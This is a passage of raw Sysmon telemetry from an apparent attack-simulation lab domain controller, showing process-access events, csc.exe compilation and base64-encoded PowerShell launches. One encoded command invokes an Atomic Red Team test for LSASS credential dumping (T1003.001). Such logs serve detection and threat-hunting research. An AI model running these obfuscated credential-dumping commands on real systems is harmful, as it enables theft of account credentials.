15:52:45.350{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004179Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004178Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004177Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004176Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004175Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004174Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7CCC-5FA1-CB00-000000008801}35085008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF8DC7A8890) 154100x80000000000000004173Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.354{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000004172Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:45.100{D28789B6-7CCD-5FA1-CD00-000000008801}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2lwsxlaa.dll2020-11-03 15:52:45.006 10341000x80000000000000004171Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCD-5FA1-CE00-000000008801}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004170Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004169Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004168Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004167Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004166Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004165Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004164Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004163Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004162Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004161Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CCD-5FA1-CE00-000000008801}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004160Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7CCD-5FA1-CD00-000000008801}48043232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CCD-5FA1-CE00-000000008801}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004159Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.107{D28789B6-7CCD-5FA1-CE00-000000008801}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESB486.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCDF7E66BBCD549C5A99AB2325CC543A.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CCD-5FA1-CD00-000000008801}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\2lwsxlaa.cmdline" 10341000x80000000000000004158Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004157Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.100{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004156Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 